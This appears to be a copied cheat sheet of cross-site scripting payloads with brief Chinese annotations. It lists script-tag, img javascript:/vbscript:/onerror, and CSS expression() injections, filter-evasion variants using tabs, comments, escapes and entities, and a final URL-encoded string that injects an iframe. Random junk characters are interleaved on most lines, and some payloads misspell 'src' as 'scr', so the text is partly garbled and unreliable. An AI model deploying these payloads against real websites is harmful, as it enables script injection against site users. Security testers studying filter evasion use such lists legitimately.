<script>alert("跨站")</script> (最常用)
5 R b/ a- Q$ K. v<img scr=javascript:alert("跨站")></img>
& k; [' f5 v5 `& ?' \<img scr="javascript: alert(/跨站/)></img>1 b( T( I& [% @. i& v7 @
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
5 g7 D8 _* C. R7 W$ a) O0 ?; Z0 U<img scr="#" onerror=alert(/跨站/)></img>0 `3 ^" b6 N4 ]$ X% z+ z& N
<img scr="#" style="xss:expression(alert(/xss/));"></img>4 H7 i% I& _4 Y7 @0 ^9 Q# g' `
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ Y; z$ {" v' F3 H( \1 x<img src=vbscript:msgbox ("xss")></img>
) z( t3 [6 O. h<style> input {left:expression (alert('xss'))}</style> y& ?2 Q; {; h0 U( X T
<div style={left:expression (alert('xss'))}></div>: h+ ?3 Z+ q" u! z
<div style={left:exp/* */ression (alert('xss'))}></div>6 i* a. P9 y: U) K+ K6 `6 ?
<div style={left:\0065\0078ression (alert('xss'))}></div>$ i n9 f0 J) ~; f( G2 J
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
. e, h2 K) G* M" H) Hunicode <div style="{left:expRessioN (alert('xss'))}"># g! R, ?0 ~, Q, C6 E! H
6 ^# b |% S, T" v }* s$ A
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
& l, z) F$ P! D0 P7 h% T |